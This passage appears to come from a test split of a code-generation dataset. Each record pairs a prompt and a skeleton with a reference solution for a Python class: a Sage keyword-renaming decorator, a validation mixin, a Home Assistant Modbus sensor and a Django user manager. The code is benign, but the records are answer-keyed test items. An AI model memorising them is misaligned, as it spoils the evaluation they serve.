have the effect of renaming ``renamed_option`` so that the function only sees ``existing_option``. If both ``renamed_option`` and ``existing_option`` are passed to the function, ``existing_option`` will override the ``renamed_option`` value. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: r.renames {'color': 'rgbcolor'} sage: lo", "name": "__init__", "signature": "def __init__(self, deprecated=None, deprecation=None, **renames)"}, {"docstring": "Rename keywords. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(rgbcolor=1) () {'rgbcolor': 1} sage: f(color=1) () {'rgbcolor': 1} We can also deprecate the renamed keyword:: sage: r = rename_keyword(deprecation=13109, deprecated_option='new_option') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(new_option=1) () {'new_option': 1} sage: f(deprecated_option=1) doctest:...: DeprecationWarning: use the opt", "name": "__call__", "signature": "def __call__(self, func)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000641", "prompt": "Implement the Python class `rename_keyword` described below.\n\nClass description:\nImplement the rename_keyword class.\n\nMethod signatures and docstrings:\n- def __init__(self, deprecated=None, deprecation=None, **renames): A decorator which renames keyword arguments and optionally deprecates the new keyword. INPUT: - ``deprecation`` -- integer. 
The trac ticket number where the deprecation was introduced. - the rest of the arguments is a list of keyword arguments in the form ``renamed_option='existing_option'``. This will have the effect of renaming ``renamed_option`` so that the function only sees ``existing_option``. If both ``renamed_option`` and ``existing_option`` are passed to the function, ``existing_option`` will override the ``renamed_option`` value. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: r.renames {'color': 'rgbcolor'} sage: lo\n- def __call__(self, func): Rename keywords. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(rgbcolor=1) () {'rgbcolor': 1} sage: f(color=1) () {'rgbcolor': 1} We can also deprecate the renamed keyword:: sage: r = rename_keyword(deprecation=13109, deprecated_option='new_option') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(new_option=1) () {'new_option': 1} sage: f(deprecated_option=1) doctest:...: DeprecationWarning: use the opt", "prompted_full_text": "Implement the Python class `rename_keyword` described below.\n\nClass description:\nImplement the rename_keyword class.\n\nMethod signatures and docstrings:\n- def __init__(self, deprecated=None, deprecation=None, **renames): A decorator which renames keyword arguments and optionally deprecates the new keyword. INPUT: - ``deprecation`` -- integer. The trac ticket number where the deprecation was introduced. - the rest of the arguments is a list of keyword arguments in the form ``renamed_option='existing_option'``. This will have the effect of renaming ``renamed_option`` so that the function only sees ``existing_option``. If both ``renamed_option`` and ``existing_option`` are passed to the function, ``existing_option`` will override the ``renamed_option`` value. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: r.renames {'color': 'rgbcolor'} sage: lo\n- def __call__(self, func): Rename keywords. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(rgbcolor=1) () {'rgbcolor': 1} sage: f(color=1) () {'rgbcolor': 1} We can also deprecate the renamed keyword:: sage: r = rename_keyword(deprecation=13109, deprecated_option='new_option') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(new_option=1) () {'new_option': 1} sage: f(deprecated_option=1) doctest:...: DeprecationWarning: use the opt\n\n<|skeleton|>\nclass rename_keyword:\n\n def __init__(self, deprecated=None, deprecation=None, **renames):\n \"\"\"A decorator which renames keyword arguments and optionally deprecates the new keyword. INPUT: - ``deprecation`` -- integer. The trac ticket number where the deprecation was introduced. - the rest of the arguments is a list of keyword arguments in the form ``renamed_option='existing_option'``. This will have the effect of renaming ``renamed_option`` so that the function only sees ``existing_option``. 
If both ``renamed_option`` and ``existing_option`` are passed to the function, ``existing_option`` will override the ``renamed_option`` value. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: r.renames {'color': 'rgbcolor'} sage: lo\"\"\"\n <|body_0|>\n\n def __call__(self, func):\n \"\"\"Rename keywords. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(rgbcolor=1) () {'rgbcolor': 1} sage: f(color=1) () {'rgbcolor': 1} We can also deprecate the renamed keyword:: sage: r = rename_keyword(deprecation=13109, deprecated_option='new_option') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(new_option=1) () {'new_option': 1} sage: f(deprecated_option=1) doctest:...: DeprecationWarning: use the opt\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert deprecated is None, 'Use @rename_keyword(deprecation=, ...)'\n self.renames = renames\n self.deprecation = deprecation\n<|end_body_0|>\n\n<|body_start_1|>\n @sage_wraps(func)\n def wrapper(*args, **kwds):\n for old_name, new_name in self.renames.items():\n if old_name in kwds and new_name not in kwds:\n if self.deprecation is not None:\n from sage.misc.superseded import deprecation\n deprecation(self.deprecation, 'use the option %r instead of %r' % (new_name, old_name))\n kwds[new_name] = kwds[old_name]\n del kwds[old_name]\n return func(*args, **kwds)\n return wrapper\n<|end_body_1|>\n", "revision_id": "0d9eacbf74e2acffefde93e39f8bcbec745cdaba", "skeleton": "<|skeleton|>\nclass rename_keyword:\n\n def __init__(self, deprecated=None, deprecation=None, **renames):\n \"\"\"A decorator which renames keyword arguments and optionally deprecates the new keyword. INPUT: - ``deprecation`` -- integer. The trac ticket number where the deprecation was introduced. - the rest of the arguments is a list of keyword arguments in the form ``renamed_option='existing_option'``. This will have the effect of renaming ``renamed_option`` so that the function only sees ``existing_option``. If both ``renamed_option`` and ``existing_option`` are passed to the function, ``existing_option`` will override the ``renamed_option`` value. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: r.renames {'color': 'rgbcolor'} sage: lo\"\"\"\n <|body_0|>\n\n def __call__(self, func):\n \"\"\"Rename keywords. 
EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(rgbcolor=1) () {'rgbcolor': 1} sage: f(color=1) () {'rgbcolor': 1} We can also deprecate the renamed keyword:: sage: r = rename_keyword(deprecation=13109, deprecated_option='new_option') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(new_option=1) () {'new_option': 1} sage: f(deprecated_option=1) doctest:...: DeprecationWarning: use the opt\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class rename_keyword:\n def __init__(self, deprecated=None, deprecation=None, **renames):\n \"\"\"A decorator which renames keyword arguments and optionally deprecates the new keyword. INPUT: - ``deprecation`` -- integer. The trac ticket number where the deprecation was introduced. - the rest of the arguments is a list of keyword arguments in the form ``renamed_option='existing_option'``. This will have the effect of renaming ``renamed_option`` so that the function only sees ``existing_option``. If both ``renamed_option`` and ``existing_option`` are passed to the function, ``existing_option`` will override the ``renamed_option`` value. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: r.renames {'color': 'rgbcolor'} sage: lo\"\"\"\n assert deprecated is None, 'Use @rename_keyword(deprecation=, ...)'\n self.renames = renames\n self.deprecation = deprecation\n\n def __call__(self, func):\n \"\"\"Rename keywords. 
EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(rgbcolor=1) () {'rgbcolor': 1} sage: f(color=1) () {'rgbcolor': 1} We can also deprecate the renamed keyword:: sage: r = rename_keyword(deprecation=13109, deprecated_option='new_option') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(new_option=1) () {'new_option': 1} sage: f(deprecated_option=1) doctest:...: DeprecationWarning: use the opt\"\"\"\n @sage_wraps(func)\n def wrapper(*args, **kwds):\n for old_name, new_name in self.renames.items():\n if old_name in kwds and new_name not in kwds:\n if self.deprecation is not None:\n from sage.misc.superseded import deprecation\n deprecation(self.deprecation, 'use the option %r instead of %r' % (new_name, old_name))\n kwds[new_name] = kwds[old_name]\n del kwds[old_name]\n return func(*args, **kwds)\n return wrapper\n", "source": "the_stack_v2_python_sparse", "source_path": "sage/src/sage/misc/decorators.py", "source_repo": "bopopescu/geosci", "split": "test", "star_events_count": 0} {"blob_id": "59f807542b550a07d64ae0ac56cfc8b5e9582621", "bodies": ["if value is None or self.MIN_PRIORITY <= value <= self.MAX_PRIORITY:\n return value\nerr_args = (key, self.MIN_PRIORITY, self.MAX_PRIORITY, value)\nraise ValueError('%s must be between %s and %s, got %s instead' % err_args)", "if value is None or value >= 0:\n return value\nraise ValueError('%s cannot be less than zero' % key)"], "bodies_text": "<|body_start_0|>\n if value is None or self.MIN_PRIORITY <= value <= self.MAX_PRIORITY:\n return value\n err_args = (key, self.MIN_PRIORITY, self.MAX_PRIORITY, value)\n raise ValueError('%s must be between %s and %s, got %s instead' % err_args)\n<|end_body_0|>\n\n<|body_start_1|>\n if value is None or value >= 0:\n return value\n raise ValueError('%s cannot be less than zero' % key)\n<|end_body_1|>\n", "class_docstring": "Mixin that adds a `state` column and uses a class level `STATE_ENUM` attribute to assist in validation.", "class_name": "ValidatePriorityMixin", "detected_licenses": ["BSD-3-Clause", "Apache-2.0", "MIT", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ValidatePriorityMixin:\n \"\"\"Mixin that adds a `state` column and uses a class level `STATE_ENUM` attribute to assist in validation.\"\"\"\n\n def validate_priority(self, key, value):\n \"\"\"ensures the value provided to priority is valid\"\"\"\n <|body_0|>\n\n def validate_attempts(self, key, value):\n \"\"\"ensures the number of attempts provided is valid\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if value is None or self.MIN_PRIORITY <= value <= self.MAX_PRIORITY:\n return value\n err_args = (key, self.MIN_PRIORITY, self.MAX_PRIORITY, value)\n raise ValueError('%s must be between %s and %s, got %s instead' % err_args)\n<|end_body_0|>\n\n<|body_start_1|>\n if value is None or value >= 0:\n return value\n raise ValueError('%s cannot be less than zero' % key)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000418", "length_bytes": 16227, "license_type": "permissive", "methods": [{"docstring": "ensures the value provided to priority is valid", "name": "validate_priority", "signature": "def validate_priority(self, key, value)"}, 
{"docstring": "ensures the number of attempts provided is valid", "name": "validate_attempts", "signature": "def validate_attempts(self, key, value)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002827", "prompt": "Implement the Python class `ValidatePriorityMixin` described below.\n\nClass description:\nMixin that adds a `state` column and uses a class level `STATE_ENUM` attribute to assist in validation.\n\nMethod signatures and docstrings:\n- def validate_priority(self, key, value): ensures the value provided to priority is valid\n- def validate_attempts(self, key, value): ensures the number of attempts provided is valid", "prompted_full_text": "Implement the Python class `ValidatePriorityMixin` described below.\n\nClass description:\nMixin that adds a `state` column and uses a class level `STATE_ENUM` attribute to assist in validation.\n\nMethod signatures and docstrings:\n- def validate_priority(self, key, value): ensures the value provided to priority is valid\n- def validate_attempts(self, key, value): ensures the number of attempts provided is valid\n\n<|skeleton|>\nclass ValidatePriorityMixin:\n \"\"\"Mixin that adds a `state` column and uses a class level `STATE_ENUM` attribute to assist in validation.\"\"\"\n\n def validate_priority(self, key, value):\n \"\"\"ensures the value provided to priority is valid\"\"\"\n <|body_0|>\n\n def validate_attempts(self, key, value):\n \"\"\"ensures the number of attempts provided is valid\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if value is None or self.MIN_PRIORITY <= value <= self.MAX_PRIORITY:\n return value\n err_args = (key, self.MIN_PRIORITY, self.MAX_PRIORITY, value)\n raise ValueError('%s must be between %s and %s, got %s instead' % err_args)\n<|end_body_0|>\n\n<|body_start_1|>\n if value is None or value >= 0:\n return value\n raise ValueError('%s cannot be less than zero' % key)\n<|end_body_1|>\n", "revision_id": "ea04bbcb807eb669415c569417b4b1b68e75d29d", "skeleton": "<|skeleton|>\nclass ValidatePriorityMixin:\n \"\"\"Mixin that adds a `state` column and uses a class level `STATE_ENUM` attribute to assist in validation.\"\"\"\n\n def validate_priority(self, key, value):\n \"\"\"ensures the value provided to priority is valid\"\"\"\n <|body_0|>\n\n def validate_attempts(self, key, value):\n \"\"\"ensures the number of attempts provided is valid\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ValidatePriorityMixin:\n \"\"\"Mixin that adds a `state` column and uses a class level `STATE_ENUM` attribute to assist in validation.\"\"\"\n\n def validate_priority(self, key, value):\n \"\"\"ensures the value provided to priority is valid\"\"\"\n if value is None or self.MIN_PRIORITY <= value <= self.MAX_PRIORITY:\n return value\n err_args = (key, self.MIN_PRIORITY, self.MAX_PRIORITY, value)\n raise ValueError('%s must be between %s and %s, got %s instead' % err_args)\n\n def validate_attempts(self, key, value):\n \"\"\"ensures the number of attempts provided is valid\"\"\"\n if value is None or value >= 0:\n return value\n raise ValueError('%s cannot be less than zero' % key)\n", "source": "the_stack_v2_python_sparse", "source_path": "pyfarm/models/core/mixins.py", "source_repo": "pyfarm/pyfarm-master", "split": "test", "star_events_count": 2} {"blob_id": "4408d3351401dc52435f2ab39e1f26ace725432a", "bodies": ["super().__init__(hub, entry)\nif slave_count:\n self._count = 
self._count * (slave_count + 1)\nself._coordinator: DataUpdateCoordinator[list[int] | None] | None = None\nself._attr_native_unit_of_measurement = entry.get(CONF_UNIT_OF_MEASUREMENT)\nself._attr_state_class = entry.get(CONF_STATE_CLASS)\nself._attr_device_class = entry.get(CONF_DEVICE_CLASS)", "name = self._attr_name if self._attr_name else 'modbus_sensor'\nself._coordinator = DataUpdateCoordinator(hass, _LOGGER, name=name)\nslaves: list[SlaveSensor] = []\nfor idx in range(0, slave_count):\n slaves.append(SlaveSensor(self._coordinator, idx, entry))\nreturn slaves", "await self.async_base_added_to_hass()\nstate = await self.async_get_last_sensor_data()\nif state:\n self._attr_native_value = state.native_value", "raw_result = await self._hub.async_pb_call(self._slave, self._address, self._count, self._input_type)\nif raw_result is None:\n if self._lazy_errors:\n self._lazy_errors -= 1\n return\n self._lazy_errors = self._lazy_error_count\n self._attr_available = False\n self._attr_native_value = None\n if self._coordinator:\n self._coordinator.async_set_updated_data(None)\n self.async_write_ha_state()\n return\nresult = self.unpack_structure_result(raw_result.registers)\nif self._coordinator:\n if result:\n result_array = list(map(float if self._precision else int, result.split(',')))\n self._attr_native_value = result_array[0]\n self._coordinator.async_set_updated_data(result_array)\n else:\n self._attr_native_value = None\n self._coordinator.async_set_updated_data(None)\nelse:\n self._attr_native_value = result\nself._attr_available = self._attr_native_value is not None\nself._lazy_errors = self._lazy_error_count\nself.async_write_ha_state()"], "bodies_text": "<|body_start_0|>\n super().__init__(hub, entry)\n if slave_count:\n self._count = self._count * (slave_count + 1)\n self._coordinator: DataUpdateCoordinator[list[int] | None] | None = None\n self._attr_native_unit_of_measurement = entry.get(CONF_UNIT_OF_MEASUREMENT)\n self._attr_state_class = entry.get(CONF_STATE_CLASS)\n self._attr_device_class = entry.get(CONF_DEVICE_CLASS)\n<|end_body_0|>\n\n<|body_start_1|>\n name = self._attr_name if self._attr_name else 'modbus_sensor'\n self._coordinator = DataUpdateCoordinator(hass, _LOGGER, name=name)\n slaves: list[SlaveSensor] = []\n for idx in range(0, slave_count):\n slaves.append(SlaveSensor(self._coordinator, idx, entry))\n return slaves\n<|end_body_1|>\n\n<|body_start_2|>\n await self.async_base_added_to_hass()\n state = await self.async_get_last_sensor_data()\n if state:\n self._attr_native_value = state.native_value\n<|end_body_2|>\n\n<|body_start_3|>\n raw_result = await self._hub.async_pb_call(self._slave, self._address, self._count, self._input_type)\n if raw_result is None:\n if self._lazy_errors:\n self._lazy_errors -= 1\n return\n self._lazy_errors = self._lazy_error_count\n self._attr_available = False\n self._attr_native_value = None\n if self._coordinator:\n self._coordinator.async_set_updated_data(None)\n self.async_write_ha_state()\n return\n result = self.unpack_structure_result(raw_result.registers)\n if self._coordinator:\n if result:\n result_array = list(map(float if self._precision else int, result.split(',')))\n self._attr_native_value = result_array[0]\n self._coordinator.async_set_updated_data(result_array)\n else:\n self._attr_native_value = None\n self._coordinator.async_set_updated_data(None)\n else:\n self._attr_native_value = result\n self._attr_available = self._attr_native_value is not None\n self._lazy_errors = self._lazy_error_count\n 
self.async_write_ha_state()\n<|end_body_3|>\n", "class_docstring": "Modbus register sensor.", "class_name": "ModbusRegisterSensor", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ModbusRegisterSensor:\n \"\"\"Modbus register sensor.\"\"\"\n\n def __init__(self, hub: ModbusHub, entry: dict[str, Any], slave_count: int) -> None:\n \"\"\"Initialize the modbus register sensor.\"\"\"\n <|body_0|>\n\n async def async_setup_slaves(self, hass: HomeAssistant, slave_count: int, entry: dict[str, Any]) -> list[SlaveSensor]:\n \"\"\"Add slaves as needed (1 read for multiple sensors).\"\"\"\n <|body_1|>\n\n async def async_added_to_hass(self) -> None:\n \"\"\"Handle entity which will be added.\"\"\"\n <|body_2|>\n\n async def async_update(self, now: datetime | None=None) -> None:\n \"\"\"Update the state of the sensor.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(hub, entry)\n if slave_count:\n self._count = self._count * (slave_count + 1)\n self._coordinator: DataUpdateCoordinator[list[int] | None] | None = None\n self._attr_native_unit_of_measurement = entry.get(CONF_UNIT_OF_MEASUREMENT)\n self._attr_state_class = entry.get(CONF_STATE_CLASS)\n self._attr_device_class = entry.get(CONF_DEVICE_CLASS)\n<|end_body_0|>\n\n<|body_start_1|>\n name = self._attr_name if self._attr_name else 'modbus_sensor'\n self._coordinator = DataUpdateCoordinator(hass, _LOGGER, name=name)\n slaves: list[SlaveSensor] = []\n for idx in range(0, slave_count):\n slaves.append(SlaveSensor(self._coordinator, idx, entry))\n return slaves\n<|end_body_1|>\n\n<|body_start_2|>\n await self.async_base_added_to_hass()\n state = await self.async_get_last_sensor_data()\n if state:\n self._attr_native_value = state.native_value\n<|end_body_2|>\n\n<|body_start_3|>\n raw_result = await self._hub.async_pb_call(self._slave, self._address, self._count, self._input_type)\n if raw_result is None:\n if self._lazy_errors:\n self._lazy_errors -= 1\n return\n self._lazy_errors = self._lazy_error_count\n self._attr_available = False\n self._attr_native_value = None\n if self._coordinator:\n self._coordinator.async_set_updated_data(None)\n self.async_write_ha_state()\n return\n result = self.unpack_structure_result(raw_result.registers)\n if self._coordinator:\n if result:\n result_array = list(map(float if self._precision else int, result.split(',')))\n self._attr_native_value = result_array[0]\n self._coordinator.async_set_updated_data(result_array)\n else:\n self._attr_native_value = None\n self._coordinator.async_set_updated_data(None)\n else:\n self._attr_native_value = result\n self._attr_available = self._attr_native_value is not None\n self._lazy_errors = self._lazy_error_count\n self.async_write_ha_state()\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000419", "length_bytes": 6226, "license_type": "permissive", "methods": [{"docstring": "Initialize the modbus register sensor.", "name": "__init__", "signature": "def __init__(self, hub: ModbusHub, entry: dict[str, Any], slave_count: int) -> None"}, {"docstring": "Add slaves as needed (1 read for multiple sensors).", "name": "async_setup_slaves", "signature": "async def async_setup_slaves(self, hass: HomeAssistant, slave_count: int, entry: dict[str, Any]) -> list[SlaveSensor]"}, {"docstring": "Handle entity which will be added.", "name": "async_added_to_hass", "signature": "async def async_added_to_hass(self) -> None"}, {"docstring": "Update the state of the sensor.", 
"name": "async_update", "signature": "async def async_update(self, now: datetime | None=None) -> None"}], "n_methods": 4, "prompt": "Implement the Python class `ModbusRegisterSensor` described below.\n\nClass description:\nModbus register sensor.\n\nMethod signatures and docstrings:\n- def __init__(self, hub: ModbusHub, entry: dict[str, Any], slave_count: int) -> None: Initialize the modbus register sensor.\n- async def async_setup_slaves(self, hass: HomeAssistant, slave_count: int, entry: dict[str, Any]) -> list[SlaveSensor]: Add slaves as needed (1 read for multiple sensors).\n- async def async_added_to_hass(self) -> None: Handle entity which will be added.\n- async def async_update(self, now: datetime | None=None) -> None: Update the state of the sensor.", "prompted_full_text": "Implement the Python class `ModbusRegisterSensor` described below.\n\nClass description:\nModbus register sensor.\n\nMethod signatures and docstrings:\n- def __init__(self, hub: ModbusHub, entry: dict[str, Any], slave_count: int) -> None: Initialize the modbus register sensor.\n- async def async_setup_slaves(self, hass: HomeAssistant, slave_count: int, entry: dict[str, Any]) -> list[SlaveSensor]: Add slaves as needed (1 read for multiple sensors).\n- async def async_added_to_hass(self) -> None: Handle entity which will be added.\n- async def async_update(self, now: datetime | None=None) -> None: Update the state of the sensor.\n\n<|skeleton|>\nclass ModbusRegisterSensor:\n \"\"\"Modbus register sensor.\"\"\"\n\n def __init__(self, hub: ModbusHub, entry: dict[str, Any], slave_count: int) -> None:\n \"\"\"Initialize the modbus register sensor.\"\"\"\n <|body_0|>\n\n async def async_setup_slaves(self, hass: HomeAssistant, slave_count: int, entry: dict[str, Any]) -> list[SlaveSensor]:\n \"\"\"Add slaves as needed (1 read for multiple sensors).\"\"\"\n <|body_1|>\n\n async def async_added_to_hass(self) -> None:\n \"\"\"Handle entity which will be added.\"\"\"\n <|body_2|>\n\n async def async_update(self, now: datetime | None=None) -> None:\n \"\"\"Update the state of the sensor.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(hub, entry)\n if slave_count:\n self._count = self._count * (slave_count + 1)\n self._coordinator: DataUpdateCoordinator[list[int] | None] | None = None\n self._attr_native_unit_of_measurement = entry.get(CONF_UNIT_OF_MEASUREMENT)\n self._attr_state_class = entry.get(CONF_STATE_CLASS)\n self._attr_device_class = entry.get(CONF_DEVICE_CLASS)\n<|end_body_0|>\n\n<|body_start_1|>\n name = self._attr_name if self._attr_name else 'modbus_sensor'\n self._coordinator = DataUpdateCoordinator(hass, _LOGGER, name=name)\n slaves: list[SlaveSensor] = []\n for idx in range(0, slave_count):\n slaves.append(SlaveSensor(self._coordinator, idx, entry))\n return slaves\n<|end_body_1|>\n\n<|body_start_2|>\n await self.async_base_added_to_hass()\n state = await self.async_get_last_sensor_data()\n if state:\n self._attr_native_value = state.native_value\n<|end_body_2|>\n\n<|body_start_3|>\n raw_result = await self._hub.async_pb_call(self._slave, self._address, self._count, self._input_type)\n if raw_result is None:\n if self._lazy_errors:\n self._lazy_errors -= 1\n return\n self._lazy_errors = self._lazy_error_count\n self._attr_available = False\n self._attr_native_value = None\n if self._coordinator:\n self._coordinator.async_set_updated_data(None)\n self.async_write_ha_state()\n return\n result = self.unpack_structure_result(raw_result.registers)\n if self._coordinator:\n if result:\n 
result_array = list(map(float if self._precision else int, result.split(',')))\n self._attr_native_value = result_array[0]\n self._coordinator.async_set_updated_data(result_array)\n else:\n self._attr_native_value = None\n self._coordinator.async_set_updated_data(None)\n else:\n self._attr_native_value = result\n self._attr_available = self._attr_native_value is not None\n self._lazy_errors = self._lazy_error_count\n self.async_write_ha_state()\n<|end_body_3|>\n", "revision_id": "80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743", "skeleton": "<|skeleton|>\nclass ModbusRegisterSensor:\n \"\"\"Modbus register sensor.\"\"\"\n\n def __init__(self, hub: ModbusHub, entry: dict[str, Any], slave_count: int) -> None:\n \"\"\"Initialize the modbus register sensor.\"\"\"\n <|body_0|>\n\n async def async_setup_slaves(self, hass: HomeAssistant, slave_count: int, entry: dict[str, Any]) -> list[SlaveSensor]:\n \"\"\"Add slaves as needed (1 read for multiple sensors).\"\"\"\n <|body_1|>\n\n async def async_added_to_hass(self) -> None:\n \"\"\"Handle entity which will be added.\"\"\"\n <|body_2|>\n\n async def async_update(self, now: datetime | None=None) -> None:\n \"\"\"Update the state of the sensor.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ModbusRegisterSensor:\n \"\"\"Modbus register sensor.\"\"\"\n\n def __init__(self, hub: ModbusHub, entry: dict[str, Any], slave_count: int) -> None:\n \"\"\"Initialize the modbus register sensor.\"\"\"\n super().__init__(hub, entry)\n if slave_count:\n self._count = self._count * (slave_count + 1)\n self._coordinator: DataUpdateCoordinator[list[int] | None] | None = None\n self._attr_native_unit_of_measurement = entry.get(CONF_UNIT_OF_MEASUREMENT)\n self._attr_state_class = entry.get(CONF_STATE_CLASS)\n self._attr_device_class = entry.get(CONF_DEVICE_CLASS)\n\n async def async_setup_slaves(self, hass: HomeAssistant, slave_count: int, entry: dict[str, Any]) -> list[SlaveSensor]:\n \"\"\"Add slaves as needed (1 read for multiple sensors).\"\"\"\n name = self._attr_name if self._attr_name else 'modbus_sensor'\n self._coordinator = DataUpdateCoordinator(hass, _LOGGER, name=name)\n slaves: list[SlaveSensor] = []\n for idx in range(0, slave_count):\n slaves.append(SlaveSensor(self._coordinator, idx, entry))\n return slaves\n\n async def async_added_to_hass(self) -> None:\n \"\"\"Handle entity which will be added.\"\"\"\n await self.async_base_added_to_hass()\n state = await self.async_get_last_sensor_data()\n if state:\n self._attr_native_value = state.native_value\n\n async def async_update(self, now: datetime | None=None) -> None:\n \"\"\"Update the state of the sensor.\"\"\"\n raw_result = await self._hub.async_pb_call(self._slave, self._address, self._count, self._input_type)\n if raw_result is None:\n if self._lazy_errors:\n self._lazy_errors -= 1\n return\n self._lazy_errors = self._lazy_error_count\n self._attr_available = False\n self._attr_native_value = None\n if self._coordinator:\n self._coordinator.async_set_updated_data(None)\n self.async_write_ha_state()\n return\n result = self.unpack_structure_result(raw_result.registers)\n if self._coordinator:\n if result:\n result_array = list(map(float if self._precision else int, result.split(',')))\n self._attr_native_value = result_array[0]\n self._coordinator.async_set_updated_data(result_array)\n else:\n self._attr_native_value = None\n self._coordinator.async_set_updated_data(None)\n else:\n 
self._attr_native_value = result\n self._attr_available = self._attr_native_value is not None\n self._lazy_errors = self._lazy_error_count\n self.async_write_ha_state()\n", "source": "the_stack_v2_python_sparse", "source_path": "homeassistant/components/modbus/sensor.py", "source_repo": "home-assistant/core", "split": "test", "star_events_count": 35501} {"blob_id": "c8b1c1b2d2ab18f52a9460373d356f84e597c542", "bodies": ["if not email:\n raise ValueError('Users must have an email address')\nuser = self.model(username=username, email=self.normalize_email(email))\nuser.set_password(password)\nuser.save(using=self._db)\nreturn user", "user = self.create_user(username, email, password=password)\nuser.is_admin = True\nuser.is_staff = True\nuser.save(using=self._db)\nreturn user"], "bodies_text": "<|body_start_0|>\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(username=username, email=self.normalize_email(email))\n user.set_password(password)\n user.save(using=self._db)\n return user\n<|end_body_0|>\n\n<|body_start_1|>\n user = self.create_user(username, email, password=password)\n user.is_admin = True\n user.is_staff = True\n user.save(using=self._db)\n return user\n<|end_body_1|>\n", "class_docstring": "", "class_name": "MyUserManager", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MyUserManager:\n\n def create_user(self, username, email, password=None):\n \"\"\"Creates and saves a User with the given email, date of birth and password.\"\"\"\n <|body_0|>\n\n def create_superuser(self, username, email, password):\n \"\"\"Creates and saves a superuser with the given email, date of birth and password.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(username=username, email=self.normalize_email(email))\n user.set_password(password)\n user.save(using=self._db)\n return user\n<|end_body_0|>\n\n<|body_start_1|>\n user = self.create_user(username, email, password=password)\n user.is_admin = True\n user.is_staff = True\n user.save(using=self._db)\n return user\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000420", "length_bytes": 3320, "license_type": "no_license", "methods": [{"docstring": "Creates and saves a User with the given email, date of birth and password.", "name": "create_user", "signature": "def create_user(self, username, email, password=None)"}, {"docstring": "Creates and saves a superuser with the given email, date of birth and password.", "name": "create_superuser", "signature": "def create_superuser(self, username, email, password)"}], "n_methods": 2, "original_id": 